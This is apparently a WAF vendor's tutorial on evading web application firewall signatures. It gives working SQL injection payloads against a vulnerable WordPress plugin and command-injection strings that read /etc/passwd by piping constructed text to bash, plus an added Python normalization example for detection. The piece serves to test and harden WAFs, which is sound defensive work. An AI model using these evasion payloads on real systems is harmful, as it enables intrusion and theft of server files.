WAF bypass techniques

Nemesida WAF
3 min read · Aug 13, 2019

The information is for introduction only. Do not break the law.

A Web Application Firewall (WAF) is a popular tool for countering attacks on web applications. In this article I will show some WAF bypass techniques.

WAF bypass: SQL injection

Before the demonstration I set up a web application based on the WordPress CMS and installed a plugin with a vulnerability in a cookie parameter. Now let's try to exploit it using the payload:

["1807192982')) union select 1,2,3,4,5,6,7,8,9,0,11#"]

The payload was blocked by the WAF, but we will try to bypass it:

["1807192982')) union se","lect 1,2,3,4,5,6,7,8,9,0,11#"]

In this example we split the union and select operators with the characters ",".

This method bypasses the WAF; on the web application side the parts of the request are reassembled and processed as union select. Another variant:

["1807192982')) union/**/select/**/1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/'pentestit',/**/11#"]

Replacing all blank characters with comments does not help here: the WAF is still able to detect the attack. The words union or select on their own can occur in legitimate requests, but their combination is what builds the attack, so the simplest signature is union\s+select, which keeps false positives low. The next payload puts no whitespace between the two keywords at all:

["1807192982')) union(select(1),2,3,4,5,6,7,8,9,0x70656e746573746974,11)#"]

Another way is to wrap the operators in block comments of the form /*! ... */, which is MySQL-specific:

["1807192982')) /*!u%6eion*/ /*!se%6cect*/ (1),(2),(3),(4),(5),(6),(7),(8),(9.),(0x70656e746573746974),(11)#"]

It is also possible to replace some characters with their URL-encoded hexadecimal codes:

["1807192982')) %2f**%2funion%2f**%2fselect (1),(2),(3),(4),(5),(6),(7),(8),(9),(0x70656e746573746974),(11)#"]

This is similar to the previous one, but here the slash is replaced by its hexadecimal code.
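As an added illustration that is not part of the original article, the Python below applies the signature union\s+select first to the raw value and then after normalizing it (URL-decoding, keeping the body of /*!...*/ comments, dropping ordinary comments, treating parentheses as separators), showing why the raw signature misses the payloads above and how a WAF recovers detection. The payload strings are shortened copies of the article's examples and the benign string is constructed.

```python
import re
from urllib.parse import unquote

# Shortened copies of the article's payloads (constructed test input).
BLOCKED = "1807192982')) union select 1,2,3,4,5,6,7,8,9,0,11#"
EVASIONS = [
    "1807192982')) union/**/select/**/1,/**/2,/**/3#",
    "1807192982')) union(select(1),2,3,0x70656e746573746974)#",
    "1807192982')) /*!u%6eion*/ /*!se%6cect*/ (1),(2),(3)#",
    "1807192982')) %2f**%2funion%2f**%2fselect (1),(2),(3)#",
]
BENIGN = "credit union branch select store"  # constructed legitimate value

# The simplest signature suggested in the article.
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)


def normalize(value: str) -> str:
    """Canonicalise a parameter value before signature matching."""
    # 1. Undo URL encoding until stable, so %2f -> '/' and %6e -> 'n'
    #    (this also covers double encoding).
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    # 2. Keep the body of MySQL executable comments /*!...*/, since the
    #    server runs it; an optional leading version number is dropped.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # 3. Drop ordinary block comments, which MySQL treats as whitespace.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # 4. Parentheses separate tokens just as whitespace does.
    value = re.sub(r"[()]", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def raw_match(value: str) -> bool:
    """Signature applied directly to the raw value (what the article bypasses)."""
    return SIGNATURE.search(value) is not None


def normalized_match(value: str) -> bool:
    """Signature applied after normalization."""
    return SIGNATURE.search(normalize(value)) is not None


if __name__ == "__main__":
    for p in [BLOCKED, *EVASIONS, BENIGN]:
        print(f"raw={raw_match(p)!s:5} normalized={normalized_match(p)!s:5} {p}")
```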

WAF bypass: RCE

Let's examine WAF bypass methods while exploiting an RCE vulnerability on a test page created earlier, which does not filter its fields on the web application side. For example, we want to send the request http://site.test.lan/test.php?search=cat /etc/passwd. In this form it is blocked by WAF signatures.

Server’s answer:

Let’s try to change the request:

cat /etc/pa?swd
cat /etc/pa'ss'wd
cat /etc/pa**wd

Server’s answer:

By modifying a request that WAF signatures block in different ways, we can obtain an expression that the WAF does not recognise as an attack. In this case the signature searches the request for the keyword password; splitting that keyword across the request prevents the WAF from matching it:

ec'h'o 'cat /etc/examplewd' | sed 's/example/pass/g' | bash

This command is processed step by step: echo outputs the string cat /etc/examplewd, sed replaces the needed part of that string according to the template, the changed string is piped into bash and executed on the server, and the result is returned to the user. To the WAF the request looks like a string with no signature features, but on the server side it is executed as a bash command and its output is returned in the web application:

e'c'ho 'swd test pentest' |awk '{print "cat /etc/pas"$1}' |bash

This method is similar to the previous one, but uses awk. One more variant:

c\a\t \/\e\t\c/\p\a\s\sw\d

Bash allows characters to be escaped with \, and this can be used to construct the request.

Thus, signature-based attack detection is not a reliable method of protecting web applications. Understanding how signatures are built, and using a WAF with machine learning, helps counter these protection bypass methods.

P.S.: If you use a WAF, make sure it blocks the examples examined here and their modifications.


Written by Nemesida WAF

A modern on-prem application security platform that protects all forms web traffic, services and APIs. Powered by Nemesida AI.
